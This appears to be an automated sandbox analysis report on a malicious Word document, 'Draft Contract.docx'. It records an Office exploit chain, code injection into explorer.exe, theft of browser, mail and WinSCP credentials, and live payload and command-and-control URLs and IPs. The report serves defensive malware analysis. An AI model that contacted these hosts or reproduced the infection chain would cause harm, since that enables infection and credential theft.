              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00122308 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,16_2_00122308

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: A173.exe PID: 260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: A173.exe PID: 1300, type: MEMORYSTR
              Source: Yara matchFile source: 00000014.00000002.1192013184.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1191957293.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2196, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1780, type: MEMORYSTR
              Source: Yara matchFile source: 25.2.efbhiii.2215a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.regasm.exe.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.efbhiii.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.regasm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: Yara matchFile source: 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: A173.exe PID: 1300, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEO
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEO
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWB
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWB
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJ
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJ
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: number of queries: 1032

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: A173.exe PID: 260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: A173.exe PID: 1300, type: MEMORYSTR
              Source: Yara matchFile source: 00000014.00000002.1192013184.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1191957293.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2196, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1780, type: MEMORYSTR
              Source: Yara matchFile source: 25.2.efbhiii.2215a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.regasm.exe.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.efbhiii.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.regasm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium35
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Scripting
              11
              Registry Run Keys / Startup Folder
              712
              Process Injection
              111
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              24
              File and Directory Discovery
              Remote Desktop Protocol11
              Data from Local System
              Exfiltration Over Bluetooth21
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts3
              Native API
              Logon Script (Windows)11
              Registry Run Keys / Startup Folder
              1
              Scripting
              Security Account Manager138
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration4
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts33
              Exploitation for Client Execution
              Logon Script (Mac)Logon Script (Mac)2
              Obfuscated Files or Information
              NTDS441
              Security Software Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer125
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud Accounts2
              Command and Scripting Interpreter
              Network Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets241
              Virtualization/Sandbox Evasion
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable Media1
              PowerShell
              Rc.commonRc.common1
              DLL Side-Loading
              Cached Domain Credentials3
              Process Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items121
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job241
              Virtualization/Sandbox Evasion
              Proc Filesystem1
              Remote System Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
              Process Injection
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
              Hidden Files and Directories
              Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 751344 Sample: Draft Contract.docx Startdate: 22/11/2022 Architecture: WINDOWS Score: 100 79 dropbuyinc.ga 2->79 81 www.hzncars.com.my 2->81 95 Snort IDS alert for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Antivirus detection for URL or domain 2->99 101 16 other signatures 2->101 11 EQNEDT32.EXE 12 2->11         started        15 taskeng.exe 1 2->15         started        17 WINWORD.EXE 293 46 2->17         started        signatures3 process4 dnsIp5 67 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->67 dropped 69 C:\Users\Public\regasm.exe, PE32 11->69 dropped 149 Office equation editor establishes network connection 11->149 151 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->151 20 regasm.exe 11->20         started        23 efbhiii 15->23         started        25 efbhiii 15->25         started        75 192.227.132.49, 49171, 49172, 80 AS-COLOCROSSINGUS United States 17->75 77 192.168.2.255, 137, 138 unknown unknown 17->77 71 C:\Users\user\AppData\Local\...\F43FFB53.doc, data 17->71 dropped 73 C:\Users\user\...\0000_000000_00000[1].doc, data 17->73 dropped file6 signatures7 process8 signatures9 103 Multi AV Scanner detection for dropped file 20->103 105 Machine Learning detection for dropped file 20->105 107 Contains functionality to inject code into remote processes 20->107 27 regasm.exe 20->27         started        109 Injects a PE file into a foreign processes 23->109 30 efbhiii 23->30         started        32 efbhiii 25->32         started        process10 signatures11 141 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 27->141 143 Maps a DLL or memory area into another process 27->143 145 Checks if the current machine is a virtual machine (disk enumeration) 27->145 34 explorer.exe 4 7 27->34 injected 147 Creates a thread in another existing process (thread injection) 30->147 process12 dnsIp13 83 ndtcconsultant.com 69.160.38.3, 443, 49174 SSASN2US United States 34->83 85 esplogem.ga 34.174.217.42, 49173, 49176, 49179 ATGS-MMD-ASUS United States 34->85 57 C:\Users\user\AppData\Roaming\efbhiii, PE32 34->57 dropped 59 C:\Users\user\AppData\Local\Temp\A173.exe, PE32 34->59 dropped 111 System process connects to network (likely due to code injection or exploit) 34->111 113 Benign windows process drops PE files 34->113 115 Injects code into the Windows Explorer (explorer.exe) 34->115 117 2 other signatures 34->117 39 A173.exe 13 3 34->39         started        44 explorer.exe 6 34->44         started        46 Wlrfmqer.exe 34->46         started        48 6 other processes 34->48 file14 signatures15 process16 dnsIp17 91 www.hzncars.com.my 183.78.168.24, 49175, 49178, 49180 TECHAVENUE-APTechAvenueMalaysiaMY Malaysia 39->91 65 C:\Users\user\AppData\...\Wlrfmqer.exe, PE32 39->65 dropped 125 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->125 127 May check the online IP address of the machine 39->127 129 Machine Learning detection for dropped file 39->129 139 4 other signatures 39->139 50 A173.exe 39->50         started        55 powershell.exe 39->55         started        93 esplogem.ga 44->93 131 System process connects to network (likely due to code injection or exploit) 44->131 133 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 44->133 135 Tries to steal Mail credentials (via file / registry access) 44->135 137 Tries to harvest and steal browser information (history, passwords, etc) 44->137 file18 signatures19 process20 dnsIp21 87 api.ipify.org.herokudns.com 3.232.242.170, 443, 49177 AMAZON-AESUS United States 50->87 89 api.ipify.org 50->89 61 C:\Users\user\AppData\Roaming\...\nEdENIr.exe, PE32 50->61 dropped 63 C:\Users\user\AppData\...\tmpG115.tmp (copy), PE32 50->63 dropped 119 Creates multiple autostart registry keys 50->119 121 Tries to harvest and steal browser information (history, passwords, etc) 50->121 123 Hides that the sample has been downloaded from the Internet (zone.identifier) 50->123 file22 signatures23

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Draft Contract.docx18%ReversingLabsDocument-HTML.Exploit.CVE-2017-0199
              Draft Contract.docx100%AviraEXP/CVE-2017-0199.Gen
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Roaming\efbhiii100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\nEdENIr\nEdENIr.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\A173.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe100%Joe Sandbox ML
              C:\Users\Public\regasm.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe35%ReversingLabsWin32.Trojan.Woreflint
              C:\Users\user\AppData\Roaming\efbhiii35%ReversingLabsWin32.Trojan.Woreflint
              C:\Users\Public\regasm.exe35%ReversingLabsWin32.Trojan.Woreflint
              SourceDetectionScannerLabelLinkDownload
              9.0.regasm.exe.400000.2.unpack100%AviraTR/Patched.GenDownload File
              14.0.efbhiii.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.0.efbhiii.400000.0.unpack100%AviraTR/Patched.GenDownload File
              26.0.efbhiii.400000.1.unpack100%AviraTR/Patched.GenDownload File
              7.2.regasm.exe.1b15a0.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.0.efbhiii.400000.3.unpack100%AviraTR/Patched.GenDownload File
              9.0.regasm.exe.400000.0.unpack100%AviraTR/Patched.GenDownload File
              9.0.regasm.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.regasm.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.regasm.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              27.0.A173.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
              13.2.efbhiii.1b15a0.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.0.efbhiii.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              14.0.efbhiii.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              14.2.efbhiii.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.2.efbhiii.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.0.efbhiii.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.regasm.exe.400000.1.unpack100%AviraTR/Patched.GenDownload File
              9.2.regasm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.regasm.exe.400000.4.unpack100%AviraTR/Patched.GenDownload File
              9.0.regasm.exe.400000.3.unpack100%AviraTR/Patched.GenDownload File
              14.0.efbhiii.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              26.0.efbhiii.400000.2.unpack100%AviraTR/Patched.GenDownload File
              26.0.efbhiii.400000.4.unpack100%AviraTR/Patched.GenDownload File
              26.0.efbhiii.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              25.2.efbhiii.2215a0.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.2.A173.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1231954Download File
              SourceDetectionScannerLabelLink
              api.ipify.org.herokudns.com0%VirustotalBrowse
              ndtcconsultant.com1%VirustotalBrowse
              www.hzncars.com.my0%VirustotalBrowse
              dropbuyinc.ga3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://ocsp.entrust.net030%URL Reputationsafe
              http://www.iis.fhg.de/audioPA0%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://treyresearch.net0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://192.227.132.49/179/vbc.exehhC:100%Avira URL Cloudmalware
              http://computername/printers/printername/.printer0%Avira URL Cloudsafe
              http://java.sun.com0%URL Reputationsafe
              http://192.227.132.49/179/vbc.exej100%Avira URL Cloudmalware
              https://XMMGADR0NpyOu3G8.org0%Avira URL Cloudsafe
              http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc100%Avira URL Cloudmalware
              http://WNorAn.com0%Avira URL Cloudsafe
              http://192.227.132.49/179/vbc.exe100%Avira URL Cloudmalware
              http://192.227.132.49/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc100%Avira URL Cloudmalware
              http://api.ipify.org.herokudns.com0%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://servername/isapibackend.dll0%Avira URL Cloudsafe
              http://dropbuyinc.gaP0%Avira URL Cloudsafe
              https://XMMGADR0NpyOu3G8.orgxV0%Avira URL Cloudsafe
              http://dropbuyinc.ga0%Avira URL Cloudsafe
              http://www.hzncars.com.my0%Avira URL Cloudsafe
              https://api.ipify.orgappdatanEdENIrnEdENIr.exefacebooktwittergmailinstagrammovieskypepornhackwhatsap0%Avira URL Cloudsafe
              http://192.227.132.49/179/vbc.exent%100%Avira URL Cloudmalware
              http://www.hzncars.com.my/wp-content/Mzyroxbxfa.bmp0%Avira URL Cloudsafe
              http://esplogem.ga/Mozilla/5.00%Avira URL Cloudsafe
              http://poclecta.ga/0%Avira URL Cloudsafe
              http://esplogem.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
              https://ndtcconsultant.com/contract/2022-11-14_02-53.iso100%Avira URL Cloudmalware
              http://esplogem.ga/0%Avira URL Cloudsafe
              https://api.ipify.orgP0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org.herokudns.com
              3.232.242.170
              truefalseunknown
              ndtcconsultant.com
              69.160.38.3
              truetrueunknown
              www.hzncars.com.my
              183.78.168.24
              truefalseunknown
              dropbuyinc.ga
              34.174.217.42
              truetrueunknown
              esplogem.ga
              34.174.217.42
              truetrue
                unknown
                api.ipify.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://poclecta.ga/true
                  • Avira URL Cloud: safe
                  unknown
                  http://192.227.132.49/179/vbc.exetrue
                  • Avira URL Cloud: malware
                  unknown
                  http://192.227.132.49/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doctrue
                  • Avira URL Cloud: malware
                  unknown
                  https://api.ipify.org/false
                    high
                    https://ndtcconsultant.com/contract/2022-11-14_02-53.isofalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.hzncars.com.my/wp-content/Mzyroxbxfa.bmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://esplogem.ga/true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabexplorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://127.0.0.1:HTTP/1.1A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.entrust.net03A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://WNorAn.comA173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.iis.fhg.de/audioPAexplorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.piriform.com/ccleanerqexplorer.exe, 0000000B.00000000.958096770.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.942146947.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.969735635.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://treyresearch.netexplorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://192.227.132.49/179/vbc.exehhC:EQNEDT32.EXE, 00000005.00000002.922437200.0000000000583000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://XMMGADR0NpyOu3G8.orgA173.exe, 0000001B.00000002.1197390155.00000000021E6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.orgA173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000001B.00000002.1197240370.00000000021D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://investor.msn.com/explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                high
                                http://DynDns.comDynDNSnamejidpasswordPsi/PsiA173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://192.227.132.49/179/vbc.exejEQNEDT32.EXE, 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmptrue
